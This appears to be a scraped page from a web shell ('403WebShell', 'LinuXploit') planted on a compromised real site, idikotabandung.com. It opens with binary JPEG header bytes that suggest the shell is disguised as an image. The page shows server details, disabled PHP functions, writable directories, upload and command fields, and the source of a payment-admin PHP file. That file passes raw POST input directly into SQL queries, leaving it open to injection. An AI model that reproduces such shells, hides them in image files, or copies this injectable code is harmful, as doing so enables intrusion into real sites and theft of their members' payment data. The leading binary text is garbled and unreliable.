JFIF ( %!1"%)-...383.7(-.+  -%&--------------------------------------------------"J !1"AQaq2BR#r3Sbs4T$Dd(!1"2AQaq# ?q& JX"-` Es?Bl 1( H6fX[vʆEiB!j{hu85o%TI/*T `WTXط8%ɀt*$PaSIa9gkG$t h&)ٞ)O.4uCm!w*:K*I&bDl"+ ӹ=<Ӷ|FtI{7_/,/T ̫ԷC ȷMq9[1w!R{ U<?СCԀdc8'124,I'3-G s4IcWq$Ro瓩!"j']VӤ'B4H8n)iv$Hb=B:B=YݚXZILcA g$ΕzuPD? !զIEÁ $D'l"gp`+6֏$1Ľ˫EjUpܣvDت\2Wڰ_iIْ/~'cŧE:ɝBn9&rt,H`*Tf֙LK$#d "p/n$J oJ@'I0B+NRwj2GH.BWLOiGP W@#"@ę| 2@P D2[Vj!VE11pHn,c~T;U"H㤑EBxHClTZ7:х5,w=.`,:Lt1tE9""@pȠb\I_IƝpe &܏/ 3, WE2aDK &cy(3nI7'0W էΠ\&@:נ!oZIܻ1j@=So LJ{5UĜiʒP H{^iaH?U2j@<'13nXkdP&%ɰ&-(<]Vlya7 6c1HJcmǸ!˗GB3Ԏߏ\=qIPNĉA)JeJtEJbIxWbdóT V'0 WH*|D u6ӈHZh[8e  $v>p!rIWeB,i '佧 )g#[)m!tahm_<6nL/ BcT{"HSfp7|ybi8'.ih%,wm  403WebShell
403Webshell
Server IP : 84.32.84.62  /  Your IP : 216.73.217.80
Web Server : LiteSpeed
System : Linux id-dci-web1986.main-hosting.eu 5.14.0-611.26.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Thu Jan 29 05:24:47 EST 2026 x86_64
User : u686484674 ( 686484674)
PHP Version : 8.0.30
Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/u686484674/domains/idikotabandung.com/public_html/IDI/superadmin/bayar_admnonang.php
<?php include "header.php"; ?>

<?php
if($_SERVER['REQUEST_METHOD']=='POST'){

	//variabel untuk menampung inputan dari form
	
	
	//$id 		= $_POST['idnonspp'];
	$npm		= $_POST['npm'];
	$noreg		= $_POST['noreg'];
	$tbayar 	= $_POST['tbayar'];
	$jumlah 	= $_POST['jumlah'];
	$bayar 		= $_POST['bayar'];
	$nmlead 	= $_POST['nmlead'];
	$periode   	= $_POST['periode'];
	$perihal 	= $_POST['perihal'];
	$mbstr 	    = $_POST['mbstr'];
	$brekom 	= $_POST['brekom'];
	$biuran 	= $_POST['biuran'];
	$note 	    = $_POST['note'];
	$npa		= $_POST['npa'];
	
	$file = isset($_POST['file']) ? $_POST['file'] : null;
	
	
	$_SESSION['submit'] = true;

  if (!$_SESSION['submit']){
	
  echo "<center> <strong>form sudah disubmit sebelumnya!</strong></center>";
	
	
	header("location:status.php?npm=$npm&noreg=$noreg");

      //   header("location:d_praktek.php?npm=$npm&nmlead=$nmlead&noreg=$_SESSION[kodeid]&ahli=$ahli&view=$view");

  }else {

	$_SESSION['submit'] = false;

		
		//	$ekstensi_diperbolehkan	= array('png','jpg','jpeg');
//			$nama = $_FILES['file']['name'];
//			$x = explode('.', $nama);
//			$ekstensi = strtolower(end($x));
//			$ukuran	= $_FILES['file']['size'];
//			$file_tmp = $_FILES['file']['tmp_name'];	
//		
//			$fotobaru = $npm.$nama;
//			//$path = "images/".$fotobaru;
//	         
//	        $fotobaru1 = 'files/'.$npm.round(microtime(true));
//	         $fotobaru2 = $npm.round(microtime(true)).'.'.$ekstensi;
// 
//			if(in_array($ekstensi, $ekstensi_diperbolehkan) === true){
//				if($ukuran < 1000000*3){			
//				
//					
//					//move_uploaded_file($file_tmp, 'files/'.$fotobaru);
//					
//					move_uploaded_file($file_tmp, 'files/'.$fotobaru2);
//					$query = mysqli_query($konek,"INSERT INTO upload VALUES(NULL, '$fotobaru2')");
//				
					
	//				if($query){
						
						//echo 'FILE BERHASIL DI UPLOAD';
						
						//membuat nomor pembayaran
						$today = date("my");
					//	$query = mysqli_query($konek, "SELECT max(noinv) AS last FROM b_inv3 WHERE noinv LIKE '$today%'");
					$query = mysqli_query($konek, "SELECT max(substr(noinv,-6,6)) AS last FROM b_inv3 ");

		  
		  $data = mysqli_fetch_array($query);
						$lastNoBayar	= $data['last'];
						$lastNoUrut		= substr($lastNoBayar, -6, 6);
						$nextNoUrut		= $lastNoUrut + 1;
						$nextNoBayar	= "ADM".$today.sprintf('%06s', $nextNoUrut);
						//tanggal Bayar
						$tglBayar 	= date('Y-m-d');
		
		
				   // $update = mysqli_query($konek, "UPDATE h_registrasi SET pinv='bayar',tgliuran='$tglnext',iuran='$tglnext',nominal='$bayar' WHERE npm='$npm'");
				   				
								
								    $update = mysqli_query($konek, "UPDATE h_registrasi SET adm='bayar' WHERE npm='$npm'");

				//	$update = mysqli_query($konek, "UPDATE b_inv2 SET 
//													tgl_bayar='$tbayar',
//													status='bayar',
//													bayar ='$bayar'
//													WHERE npm='$npm' AND id_tagihan='$id' ");
//													
	
	  
		mysqli_query($konek, "INSERT INTO b_inv3 (npm,noreg,tgl_bayar,status,bayar,gambar,nominal,nmlead,noinv,periode,perihal,mbstr,biuran,brekom,tgliuran,keterangan,bayarall,stat_ang,npa)
        values('$npm','$noreg','$tbayar','bayar','$brekom','$fotobaru2','$jumlah','$nmlead','$nextNoBayar','$periode','$perihal','$mbstr','$biuran','$brekom','$mbstr','$note','$bayar','non','$npa')");

				header("location:bukti_adm.php?npm=$npm&noreg=$noreg");
					//echo "<script> document.location.href='status_reg.php?npm=$npm&noreg=$noreg''; </script>";
						
						
				//	}else{
//						 echo "<script>alert('Belum pilih Gambar choose File... ');history.go(-1);</script>";
//						  $_SESSION['submit'] = true;
//						 }
//					}else{
//						echo "<script>alert('Gagal file Terlalu besar, MAX  3 MB.. ');history.go(-1);</script>";
//					  $_SESSION['submit'] = true;
//				         }
//					}else{
//						echo "<script>alert('Gagal,Format harus Jpg,Jpeg atau Png...  ');history.go(-1);</script>";
//				      $_SESSION['submit'] = true;
//					}
					//$query = mysqli_query($konek,"INSERT INTO upload(id_file,nama_file) VALUES(NULL, '$gambar')");
       //                                           "insert into upload(npm,nama_mhs,kelas,tahunajaran,biaya)values('$nis','$nama','$kelas','$tahun','$biaya')");


					
//	  if($nama ==''){
	//	 echo "<script>alert('Upload File Bukti Transfers..!  Click choose File... ');history.go(-1);</script>";
	//		echo "Upload Bukti Transfers....";
	//	  $_SESSION['submit'] = true;
	//	}else{
						
						
						////membuat nomor pembayaran
//						$today = date("my");
//					//	$query = mysqli_query($konek, "SELECT max(noinv) AS last FROM b_inv3 WHERE noinv LIKE '$today%'");
//					$query = mysqli_query($konek, "SELECT max(substr(noinv,-6,6)) AS last FROM b_inv3 ");
//
//		  
//		  $data = mysqli_fetch_array($query);
//						$lastNoBayar	= $data['last'];
//						$lastNoUrut		= substr($lastNoBayar, -6, 6);
//						$nextNoUrut		= $lastNoUrut + 1;
//						$nextNoBayar	= "ADM".$today.sprintf('%06s', $nextNoUrut);
//						//tanggal Bayar
//						$tglBayar 	= date('Y-m-d');
//		
//		
//				   // $update = mysqli_query($konek, "UPDATE h_registrasi SET pinv='bayar',tgliuran='$tglnext',iuran='$tglnext',nominal='$bayar' WHERE npm='$npm'");
//				   				
//								
//								    $update = mysqli_query($konek, "UPDATE h_registrasi SET adm='bayar' WHERE npm='$npm'");
//
//				//	$update = mysqli_query($konek, "UPDATE b_inv2 SET 
////													tgl_bayar='$tbayar',
////													status='bayar',
////													bayar ='$bayar'
////													WHERE npm='$npm' AND id_tagihan='$id' ");
////													
//													
//		mysqli_query($konek, "INSERT INTO b_inv3 (npm,noreg,tgl_bayar,status,bayar,gambar,nominal,nmlead,noinv,periode,perihal,mbstr)
//values('$npm','$noreg','$tbayar','bayar','$bayar','$fotobaru','$jumlah','$nmlead','$nextNoBayar','$periode','$perihal','$mbstr')");
//
//				header("location:status.php?npm=$npm&noreg=$noreg");
//					//echo "<script> document.location.href='status_reg.php?npm=$npm&noreg=$noreg''; </script>";
		//		}
	}
}
//}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit